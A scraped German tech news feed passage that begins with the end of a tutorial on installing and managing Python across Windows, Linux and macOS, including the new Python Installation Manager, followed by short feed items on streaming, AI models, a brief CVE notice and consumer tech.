<p>Von Python existieren darüber hinaus auch <a href="https://www.computerwoche.de/article/2827828/10-python-distributionen-im-ueberblick.html" title="verschiedene Distributionen" target="_blank">verschiedene Distributionen</a> – ganz ähnlich wie das <a href="https://www.computerwoche.de/article/2744146/die-linux-geschichte.html" title="bei Linux" target="_blank">bei Linux</a> der Fall ist. Allerdings ist die Programmiersprache, im Gegensatz zu <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>, auch in einer offiziellen Version erhältlich, die Sie als Fallback-Option nutzen können: CPython wird von der Python Software Foundation <a href="https://www.python.org/" title="zur Verfügung gestellt" target="_blank" rel="noopener">zur Verfügung gestellt</a> und ist die sicherste und kompatibelste Distribution. Mit anderen Python-Distributionen für spezifische Use Cases können Sie zu einem späteren Zeitpunkt jederzeit experimentieren.</p>



<p>Ein wesentlicher Punkt bei der Wahl der Python-Distribution – insbesondere unter Windows – ist die Entscheidung zwischen der 32-Bit- und der 64-Bit-Version. Sehr wahrscheinlich werden Sie sich für letztere entscheiden, denn:</p>



<ul class="wp-block-list">
<li><p>die meisten modernen Betriebssysteme arbeiten standardmäßig mit der 64-Bit-Version von Python. Windows-Nutzer können die 32-Bit-Versionen der <a title="Coding-Sprache" href="https://www.computerwoche.de/article/2813209/11-wege-ihre-softwareentwicklung-neu-zu-definieren.html" target="_blank">Coding-Sprache</a> auch mit einem 64-Bit-Windows betreiben, müssen sich aber auf leichte Performance-Einbußen einstellen.</p></li>



<li><p>32-Bit-Applikationen – auch Python – können zeitgleich auf maximal 4 GB Arbeitsspeicher zugreifen. Dieses Limit kennen 64-Bit-Apps nicht. Hinzu kommt, dass viele Datenanalyse- und Machine-Learning-Tools innerhalb einer 64-bit-Umgebung am besten laufen.</p></li>
</ul>



<p>Für die 32-Bit-Version von Python sollten Sie sich lediglich dann entscheiden, wenn Sie auch ein 32-Bit-Windows oder ein Drittanbieter-Modul nutzen (müssen), welches lediglich als 32-Bit-Version vorliegt.</p>



<h2 class="wp-block-heading">Python unter Windows installieren</h2>



<p>Wie bei nahezu jeder Applikation unter Windows läuft auch die Installation von Python über einen Installer ab, der Sie durch den Setup-Prozess geleitet. Standardmäßig legt der Python-Installer .exe-Dateien unter Windows im App-Data-Verzeichnis des jeweiligen Nutzers ab – so dass keine Administratorrechte für die Installation benötigt werden.</p>



<p><strong>Den richtige Python Installer für Windows finden</strong></p>



<p><a title="Python.org" href="https://www.python.org/downloads/windows/" target="_blank" rel="noopener">Python.org</a> stellt mehrere verschiedene <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/windows-10,3530" target="_blank">Windows</a> Installer zur Verfügung. Neben der 32-Bit- (x86) und der 64-Bit-Version (x86-64) auch eine Version für Windows-ARM-Systeme, ein embeddable Zip File, eine .exe-Datei sowie einen webbasierten Installer. Diese unterscheiden sich wie folgt:</p>



<ul class="wp-block-list">
<li><p>Der .<strong>exe Installer</strong> ist lediglich eine ausführbare Datei, die den Installationsprozess von Python startet – das ist die gängigste und simpelste Lösung.</p></li>



<li><p>Der <strong>webbasierte Installer</strong> ist im Grunde identisch zu seinem .exe-Pendant, mit dem Unterschied, dass es die Dateien, die für die Installation nötig sind, separat herunterlädt. Dadurch reduziert sich die Größe des Installers drastisch, allerdings ist eine Netzwerkverbindung zwingend erforderlich.</p></li>



<li><p>Das <strong>embeddable Zip File</strong> ist eine in sich geschlossene, auf das Minimum reduzierte Kopie der <a title="Python-Laufzeitumgebung" href="https://www.computerwoche.de/article/2816760/der-bessere-weg-python-zu-kompilieren.html" target="_blank">Python-Laufzeitumgebung</a>. Das ist nützlich, wenn Sie eine Python-Applikation manuell verteilen oder schnell etwas testen wollen. Allerdings enthält dieser Installer keines der nützlichen Tools, die die anderen Versionen an Bord haben.</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Python mit einem Package Manager unter Windows installieren</strong></p>



<p>Eine weitere Option unter <a href="https://www.computerwoche.de/k/windows-10,3530" target="_blank" class="idgGlossaryLink">Windows</a> ist die Nutzung des betriebssystemeigenen Package-Management-Systems NuGet. Der Package Manager für .NET hat auch <a href="https://www.nuget.org/packages/python/" title="Python im Angebot" target="_blank" rel="noopener">Python im Angebot</a>, allerdings als Komponente für .NET-Applikationen und nicht, um als Installer für eine Standalone-Version von Python zum Einsatz zu kommen. Das Management Ihrer Python-Instanz dürfte sich deshalb mit einer regulären Installation einfacher gestalten.</p>



<p>Auch das <a href="https://www.computerwoche.de/k/windows-10,3530" target="_blank" class="idgGlossaryLink">Windows</a> Package Management System Chocolatey <a href="https://chocolatey.org/packages/python/3.8.2" title="stellt Python zur Verfügung" target="_blank" rel="noopener">stellt Python zur Verfügung</a>. Das ist im Vergleich zu NuGet in der Regel die bessere Option, weil Ihr System dabei auf eine vorhandene Python-Laufzeitumgebung überprüft wird. Allerdings sollten Sie vermeiden, reguläre Installationen und solche mit Chocolatey auf einem System zu vermischen.</p>



<h2 class="wp-block-heading">Python unter Linux installieren</h2>



<p>Weil <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>-Distributionen teilweise erhebliche Unterschiede aufweisen, sollten Sie bei der Installation von Python unter dem <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Open-Source</a>-Betriebssystem auch auf den Package Manager der jeweiligen Distribution zurückgreifen. Die Vorgehensweise bei der Installation unterscheidet sich beispielsweise im Fall von <a href="https://docs.python-guide.org/starting/install3/linux/" title="Ubuntu" target="_blank" rel="noopener">Ubuntu</a> und <a href="https://developer.fedoraproject.org/tech/languages/python/multiple-pythons.html" title="Fedora" target="_blank" rel="noopener">Fedora</a> grundlegend. Das Installations-Zielverzeichnis orientiert sich dabei im Regelfall an der Python-Versionsnummer (<em>/usr/bin/python3.x</em>).</p>



<p>Ein Weg, die Komplexität im Umgang mit <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>-Package-Managern zu umgehen ist die Nutzung einer Container-basierten Python-Laufzeitumgebung. <a href="https://www.computerwoche.de/article/2786849/7-security-tools-fuer-docker-und-kubernetes.html" title="Container" target="_blank">Container</a> sind vom Rest des Systems isoliert – Sie müssen sich also auch keine Gedanken darüber machen, dass unterschiedliche Python-Laufzeitumgebungen Konflikte verursachen. Falls Sie keine Erfahrungen im Umgang mit Containern haben, müssen Sie allerdings ein wenig Zeit und Mühe einplanen, um sich <a href="https://www.infoworld.com/article/2176798/docker-tutorial-get-started-with-docker.html" title="mit der Materie vertraut zu machen" target="_blank">mit der Materie vertraut zu machen</a>. </p>



<p>Das Tool <a href="https://asdf-vm.com/#/" title="asdf-vm" target="_blank" rel="noopener">asdf-vm</a> ist hilfreich, um mehrere Python-Laufzeitumgebungen auf <a href="https://www.computerwoche.de/article/2795308/pentester-software-statt-betriebssystem.html" title="Unix-basierten Systemen" target="_blank">Unix-basierten Systemen</a> (<a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a> und MacOS) zu managen. Dabei beschränkt sich das Tool nicht auf Python: auch mehrere Laufzeitumgebungen für Node.js, Ruby, Elixir und viele weitere Programmiersprachen können mit asdf-vm unter einen Hut gebracht werden.</p>



<h2 class="wp-block-heading">Python unter MacOS installieren</h2>



<p>Apples MacOS wurde lange mit einer vorinstallierten Python-Version ausgeliefert – allerdings kam dabei keine Version zum Einsatz, die neuer als 2.7 war. Das führte mit der Veröffentlichung von Python 3.0 des Öfteren zu Problemen beziehungsweise Konflikten. Die <a href="https://docs.python.org/3/using/mac.html" title="offizielle Python-Dokumentation" target="_blank" rel="noopener">offizielle Python-Dokumentation</a> geht am Rande auf dieses Problem ein, stellt als Lösungsansatz allerdings nur die Empfehlung bereit, den richtigen Pfad für die entsprechende Python-Instanz zu wählen.</p>



<p>Die Nutzung des <a href="https://www.infoworld.com/article/2258320/homebrew-tutorial-how-to-use-homebrew-for-macos.html" title="Homebrew Package Managers" target="_blank">Homebrew Package Managers</a> stellt einen gängigen Weg dar, um Python-Laufzeitumgebungen unter MacOS zu managen. Dieser stellt ein konsistentes Interface für Download, (De-)Installation und Management von Python zur Verfügung. </p>



<h2 class="wp-block-heading">Python Packages installieren</h2>



<p>Wenn Sie die Grundinstallation von Python abgeschlossen haben, sollten Sie im nächsten Schritt nicht direkt mit Pip (der Python Package Manager) die Packages installieren – selbst, wenn Sie Python nur für ein einzelnes Projekt nutzen wollen. Stattdessen empfiehlt es sich, virtuelle Python-Umgebungen aufzusetzen und die Packages innerhalb dieser Umgebungen zu installieren. So bleibt die Basis-Installation “clean”.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p>Eine Vielzahl von Projekten mit virtuellen Umgebungen zu managen, kann sich anspruchsvoll gestalten. Hier empfiehlt sich ein Blick auf das <a href="https://www.infoworld.com/article/3527850/better-python-project-management-with-poetry.html" title="Kommandozeilen-Tool Poetry" target="_blank">Kommandozeilen-Tool Poetry</a>.</p>



<h2 class="wp-block-heading">Mehrere Python-Versionen parallel installieren</h2>



<p>Richtig knifflig wird es, wenn mehrere verschiedene Versionen der <a href="https://www.computerwoche.de/article/2779444/eine-kleine-geschichte-der-programmiersprachen.html" title="Programmiersprache" target="_blank">Programmiersprache</a> parallel installiert werden sollen. Hier sollten Sie insbesondere zwei Dinge beachten:</p>



<ul class="wp-block-list">
<li><p>Installieren Sie jede Python-Version immer in <strong>einem eigenen Verzeichnis</strong>.</p></li>



<li><p>Stellen Sie sicher, dass die Systempfade <strong>zuerst auf die Python-Version verweisen</strong>, die standardmäßig zum Einsatz kommen soll.</p></li>
</ul>



<p>Die Einrichtung virtueller Umgebungen für jedes einzelne Projekt ist wärmstens zu empfehlen, wenn unterschiedliche Python-Versionen parallel zum Einsatz kommen sollen: So stellen Sie sicher, dass bei Aktivierung der entsprechenden virtuellen Umgebung immer automatisch die richtige Version der Coding-Sprache zum Einsatz kommt. Windows-Nutzern steht in diesem Zusammenhang mit der Py Launcher App eine weitere Option zur Verfügung. Diese kann im Rahmen des Installationsprozesses hinzugefügt werden und ermöglicht Ihnen, über Kommandozeilen-Flags auszuwählen, welche Python-Version für das jeweilige Script zum Einsatz kommen soll.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong>Mehrere Python-Versionen unter Windows managen</strong></p>



<p>Bislang war es nicht wirklich möglich, unter Windows installierte Python-Versionen zu managen. Das ändert sich ab Version 3.14 mit einem Tool, das das Python-Kernteam neu entwickelt hat. Der <a href="https://peps.python.org/pep-0773" target="_blank" rel="noreferrer noopener">Python Installation Manager for Windows</a> ist soll künftig das Mittel der Wahl darstellen, um Installationen unter Windows zu verwalten. Weil der neue Installation Manager selbst nur eine normale Windows-App ist, gibt es mehrere Möglichkeiten, diesen zu installieren. Das funktioniert über:  </p>



<ul class="wp-block-list">
<li>den <a href="https://apps.microsoft.com/detail/9nq7512cxl7t?hl=en-US&amp;gl=US" target="_blank" rel="noreferrer noopener">Microsoft Store</a>,</li>



<li>die offizielle Python-Website per <a href="https://www.python.org/downloads/release/pymanager-250b9/" target="_blank" rel="noreferrer noopener">Direkt-Download</a>, oder</li>



<li>den <a href="https://www.infoworld.com/article/2334832/intro-to-winget-microsofts-package-manager-for-windows.html" target="_blank">WinGet</a>-Paketmanager (<code>winget install 9NQ7512CXL7T</code>).</li>
</ul>



<p>Das bisherige <code>py</code>-Tool soll künftig durch den Installation Manager ersetzt werden, wobei das neue Tool das alte in Sachen Funktionalität deutlich übertrifft. Die Befehle, die zuvor funktioniert haben, können weiterhin verwendet werden. Einen nützlichen Überblick über alle wichtigen Kommandos rufen Sie mit <code>py help</code> auf:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/image-2.png" alt="Python Installation Manager help options" class="wp-image-4001984" width="835" height="799" sizes="auto, (max-width: 835px) 100vw, 835px"></figure><p class="imageCredit">IDG</p></div>



<p>Um einzusehen, welche Python-Versionen bereits auf Ihrem Windows-System vorhanden sind, nutzen Sie den Befehl <code>py list</code>:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/image-4.png?w=1024" alt="Python Installation Manager listing versions of installed Python" class="wp-image-4001985" width="1024" height="310" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">IDG</p></div>



<p>Wenn Sie an bereits installierten Python-Instanzen Änderungen vornehmen möchten, müssen Sie diese manuell entfernen und anschließend mit dem Installation Manager neu installieren. Das ist denkbar einfach:</p>



<ul class="wp-block-list">
<li>Python-Versionen fügen Sie mit <code>py install <version></version></code> hinzu,</li>



<li>rufen diese nach der Installation mit <code>py -<version></version></code> auf, und</li>



<li>nutzen <code>py uninstall <version></version></code> für die Deinstallation.</li>
</ul>



<p>Um zu sehen, welche Python-Versionen über den Manager verfügbar sind, nutzen Sie <code>py list --online</code>. Die hier gelisteten Python-Installationen lassen sich zudem mit dem Befehl <code>py list -f=json</code> im JSON-Format exportieren (CSV und JSONL sind ebenfalls verfügbar). Die standardmäßige Python-Version wird in der Auflistung durch ein Sternchen markiert:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/image_1168.png" alt="Default version of Python (3.14) shown with asterisk in Python Installation Manager" class="wp-image-4001989" width="686" height="249" sizes="auto, (max-width: 686px) 100vw, 686px"></figure><p class="imageCredit">IDG</p></div>



<p>Sobald Sie den Befehl <code>py</code> eingeben, wird diese Standard-Version aufgerufen. Falls Sie das ändern möchten, können Sie eine Umgebungsvariable definieren. Um etwa Python 3.12 als Standardversion festzulegen, würden Sie Powershell mit folgendem Kommando füttern:  </p>



<p><code>$Env:PYTHON_MANAGER_DEFAULT=„3.12“</code></p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p>Ein Befehl wie <code>py install</code> könnte allerdings leicht mit vorkonfigurierten Befehlen in virtuellen Umgebungen oder mit einem anderen Alias kollidieren. Um das zu vermeiden, können Sie <code>pymanager</code> als eindeutigen Namen für den Installation Manager nutzen. Alle Befehle bleiben dabei unverändert, lediglich der Name der Executable ändert sich.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/image-8.png" alt='Running the Python Installation Manager with the "pymanager" alias instead of "py"' class="wp-image-4001991" width="853" height="875" sizes="auto, (max-width: 853px) 100vw, 853px"></figure><p class="imageCredit">IDG</p></div>



<p>Darüber hinaus ist es auch möglich, die Windows App Execution Aliases für Befehle wie <code>python</code> und <code>python3</code> anzupassen. Dazu geben Sie lediglich <code>py install --configure</code> ein. Sie werden dann aufgefordert, die Aliase Ihres Systems zu ändern:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/image-3.png" alt="Prompt to manage Windows app execution aliases from the Python Installation Manager" class="wp-image-4001992" width="835" height="324" sizes="auto, (max-width: 835px) 100vw, 835px"></figure><p class="imageCredit">IDG</p></div>



<h2 class="wp-block-heading">Python richtig upgraden</h2>



<p>Weniger umfangreiche Python-Revisionen (etwa von 3.7.2 auf 3.7.3) stellen im Regelfall kein Problem dar: Unter <a href="https://www.computerwoche.de/k/windows-10,3530" target="_blank" class="idgGlossaryLink">Windows</a> erkennt der Installer automatisch die installierte Version und stößt das entsprechende Upgrade an – unter <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a> und MacOS in der Regel ebenso. Allerdings müssen auch alle virtuellen Umgebungen, die Sie erstellt haben, mit einem Upgrade versehen werden – das geschieht nicht automatisch.</p>



<p>Bei großen Revisionen (etwa von 3.12 auf 3.13) sollten Sie hingegen neue virtuelle Umgebungen innerhalb der einzelnen Projektverzeichnisse erstellen. Die meisten IDEs die Python unterstützen (zum Beispiel <a title="Microsoft Visual Studio Code" href="https://www.computerwoche.de/article/2815427/so-finden-sie-zum-richtigen-entwicklungs-tool.html" target="_blank">Microsoft Visual Studio Code</a>), erkennen das automatisch und ermöglichen Ihnen, zwischen den verschiedenen virtuellen Umgebungen hin- und her zu wechseln.</p>



<p><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/2256282/how-to-install-python-the-smart-way.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Deutschland vs. Spanien: So schaut ihr das U19-EM-Finale kostenlos im TV und Live-Stream]]></title>
<description><![CDATA[Die Junioren des DFB treffen im U19-EM-Finale auf Spanien. Wie ihr die Partie kostenlos im TV und Live-Stream empfangen könnt, erfahrt ihr hier.
																					Dieser Artikel wurde einsortiert unter 
																	RTL,																	YouTube,																	TV-Sender,																	B...]]></description>
<link>https://tsecurity.de/de/3662339/it-nachrichten/deutschland-vs-spanien-so-schaut-ihr-das-u19-em-finale-kostenlos-im-tv-und-live-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662339/it-nachrichten/deutschland-vs-spanien-so-schaut-ihr-das-u19-em-finale-kostenlos-im-tv-und-live-stream/</guid>
<pubDate>Sat, 11 Jul 2026 21:02:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Junioren des DFB treffen im U19-EM-Finale auf Spanien. Wie ihr die Partie kostenlos im TV und Live-Stream empfangen könnt, erfahrt ihr hier.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/rtl.html">RTL</a>,																	<a href="https://www.netzwelt.de/hersteller/google.html">YouTube</a>,																	<a href="https://www.netzwelt.de/tv-sender/">TV-Sender</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/rtl-plus-index.html">RTL+</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Disney erwägt kostenlose Inhalte auf Disney+]]></title>
<description><![CDATA[Disney könnte Teile seines Streaming-Katalogs künftig kostenlos anbieten. Wie Business Insider berichtet, laufen dazu erste Gespräche im Konzern. Motiviert werden die Überlegungen von dem wachsenden Erfolg kostenloser Dienste wie YouTube, Tubi und Roku. Kostenlose Inhalte auf Disney+ Produkt- und...]]></description>
<link>https://tsecurity.de/de/3662221/ios-mac-os/disney-erwaegt-kostenlose-inhalte-auf-disney/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662221/ios-mac-os/disney-erwaegt-kostenlose-inhalte-auf-disney/</guid>
<pubDate>Sat, 11 Jul 2026 19:23:00 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Disney könnte Teile seines Streaming-Katalogs künftig kostenlos anbieten. Wie Business Insider berichtet, laufen dazu erste Gespräche im Konzern. Motiviert werden die Überlegungen von dem wachsenden Erfolg kostenloser Dienste wie YouTube, Tubi und Roku. Kostenlose Inhalte auf Disney+ Produkt- und Technikchef Adam Smith soll ein mögliches kostenloses Angebot von Disney+ am Donnerstag bei einer Mitarbeiterversammlung angesprochen […]]]></content:encoded>
</item>
<item>
<title><![CDATA[WSL-Container: Windows-Nutzer führen Linux-Apps ohne Docker aus - BornCity]]></title>
<description><![CDATA[Microsoft ermöglicht native Linux-Container unter Windows 10 ... WSL 1 bleibt der Standard für andere virtualisierte Instanzen mit Windows Server 2019 ...]]></description>
<link>https://tsecurity.de/de/3662103/windows-server/wsl-container-windows-nutzer-fuehren-linux-apps-ohne-docker-aus-borncity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662103/windows-server/wsl-container-windows-nutzer-fuehren-linux-apps-ohne-docker-aus-borncity/</guid>
<pubDate>Sat, 11 Jul 2026 18:01:38 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft ermöglicht native Linux-Container unter Windows 10 ... WSL 1 bleibt der Standard für andere virtualisierte Instanzen mit <b>Windows Server</b> 2019 ...]]></content:encoded>
</item>
<item>
<title><![CDATA[GPT-5.6 ist also auf "Mythos-Niveau"?]]></title>
<description><![CDATA[Author: The Morpheus Tutorials - Bewertung: 39x - Views:581 GPT-5.6 ist da. Und es ist.. tatsächlich mehr als nur ein Modell.

Quellen:
https://www.blender.org/lab/mcp-server/
https://developers.openai.com/api/docs/pricing
https://openai.com/index/gpt-5-6/

Blender Benchmark auf Github: 
https://...]]></description>
<link>https://tsecurity.de/de/3661750/video/gpt-56-ist-also-auf-mythos-niveau/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661750/video/gpt-56-ist-also-auf-mythos-niveau/</guid>
<pubDate>Sat, 11 Jul 2026 13:23:37 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Morpheus Tutorials - Bewertung: 39x - Views:581 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/VrJP9hmh4NQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>GPT-5.6 ist da. Und es ist.. tatsächlich mehr als nur ein Modell.<br />
<br />
Quellen:<br />
https://www.blender.org/lab/mcp-server/<br />
https://developers.openai.com/api/docs/pricing<br />
https://openai.com/index/gpt-5-6/<br />
<br />
Blender Benchmark auf Github: <br />
https://github.com/TheMorpheus407/hogwarts-blender-benchmark<br />
<br />
MorphCook Benchmark auf Github:<br />
https://github.com/TheMorpheus407/morphcook/<br />
<br />
MorphCook:<br />
https://play.google.com/store/apps/details?id=de.themorpheus.morphcook<br />
<br />
Zum MorphReader: <br />
Android: https://play.google.com/store/apps/details?id=de.themorpheus.morph_reader_app<br />
Apple: https://apps.apple.com/de/app/morphreader/id6741467699?platform=iphone<br />
<br />
RSS Feed: https://www.patreon.com/collection/880029?view=expanded<br />
<br />
Instagram: https://www.instagram.com/themorpheustuts/<br />
<br />
Meine anderen Kanäle und Projekte: the-morpheus.de/<br />
<br />
_Selbst *kostenlos Informatik lernen* auf meiner Website:_ https://bootstrap.academy/<br />
<br />
_Discord:_<br />
https://the-morpheus.de/discord.html<br />
<br />
_Unterstützt mich - Danke!:_<br />
https://www.patreon.com/user?u=5322110<br />
https://www.paypal.me/TheMorpheus<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[World of Warcraft von einer KI: Vibe-Coder erschafft mit Claude Fable 5 ein kostenlos spielbares MMORPG]]></title>
<description><![CDATA[Mit „World of Claudecraft“ hat ein Vibe-Coder eine eigene Version des MMORPG World of Warcraft erschaffen. Dafür musste er nur wenige hundert US-Dollar in das Projekt investieren. Was das Spiel auf dem Kasten hat und wo es bisher nicht an das Original heranreicht.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3661748/it-nachrichten/world-of-warcraft-von-einer-ki-vibe-coder-erschafft-mit-claude-fable-5-ein-kostenlos-spielbares-mmorpg/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661748/it-nachrichten/world-of-warcraft-von-einer-ki-vibe-coder-erschafft-mit-claude-fable-5-ein-kostenlos-spielbares-mmorpg/</guid>
<pubDate>Sat, 11 Jul 2026 13:17:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit „World of Claudecraft“ hat ein Vibe-Coder eine eigene Version des MMORPG World of Warcraft erschaffen. Dafür musste er nur wenige hundert US-Dollar in das Projekt investieren. Was das Spiel auf dem Kasten hat und wo es bisher nicht an das Original heranreicht.
<a href="https://t3n.de/news/world-of-claudecraft-ki-mmorpg-claude-fable-5-1749653/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-23054 | Plone Docker Official Image 5.2.13 uncontrolled search path]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Plone Docker Official Image 5.2.13. Affected is an unknown function. Executing a manipulation can lead to uncontrolled search path.

This vulnerability is handled as CVE-2024-23054. The attack can be executed remotely. There is not a...]]></description>
<link>https://tsecurity.de/de/3661718/sicherheitsluecken/cve-2024-23054-plone-docker-official-image-5213-uncontrolled-search-path/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661718/sicherheitsluecken/cve-2024-23054-plone-docker-official-image-5213-uncontrolled-search-path/</guid>
<pubDate>Sat, 11 Jul 2026 13:08:27 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/plone:docker_official_image">Plone Docker Official Image 5.2.13</a>. Affected is an unknown function. Executing a manipulation can lead to uncontrolled search path.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2024-23054">CVE-2024-23054</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Umfrage: Die meisten würden im Flugzeug nur auf Langstrecken für WLAN bezahlen]]></title>
<description><![CDATA[Internet an Bord gehört bei vielen Fluggesellschaften inzwischen zum Angebot, kostenlos ist es allerdings meist nicht. Eine aktuelle Marktanalyse von Verivox zeigt nun, dass die Zahlungsbereitschaft der Passagiere vor allem von der Flugdauer abhängt. Während auf Kurz- und Mittelstrecken 53...Zum ...]]></description>
<link>https://tsecurity.de/de/3661708/it-nachrichten/umfrage-die-meisten-wuerden-im-flugzeug-nur-auf-langstrecken-fuer-wlan-bezahlen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661708/it-nachrichten/umfrage-die-meisten-wuerden-im-flugzeug-nur-auf-langstrecken-fuer-wlan-bezahlen/</guid>
<pubDate>Sat, 11 Jul 2026 13:02:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Internet an Bord gehört bei vielen Fluggesellschaften inzwischen zum Angebot, kostenlos ist es allerdings meist nicht. Eine aktuelle Marktanalyse von Verivox zeigt nun, dass die Zahlungsbereitschaft der Passagiere vor allem von der Flugdauer abhängt. Während auf Kurz- und Mittelstrecken 53...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/umfrage-die-meisten-wuerden-im-flugzeug-nur-auf-langstrecken-fuer-wlan-bezahlen/">Umfrage: Die meisten würden im Flugzeug nur auf Langstrecken für WLAN bezahlen</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google One & Gemini: Ist KI-Speicherplatz bald nicht mehr kostenlos? Große Veränderungen deuten sich an]]></title>
<description><![CDATA[In den letzten Monaten sind die Abo-Plattform Google One und das KI-Modell Gemini enger zusammengerückt, um den Nutzern umfassenden Zugriff auf die KI-Dienste zu geben. Doch während die KI-Zugänglichkeiten ausgebaut worden sind, hat man einen Bereich bisher nicht angetastet - aber das könnte sich...]]></description>
<link>https://tsecurity.de/de/3661704/it-nachrichten/google-one-gemini-ist-ki-speicherplatz-bald-nicht-mehr-kostenlos-grosse-veraenderungen-deuten-sich-an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661704/it-nachrichten/google-one-gemini-ist-ki-speicherplatz-bald-nicht-mehr-kostenlos-grosse-veraenderungen-deuten-sich-an/</guid>
<pubDate>Sat, 11 Jul 2026 13:02:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
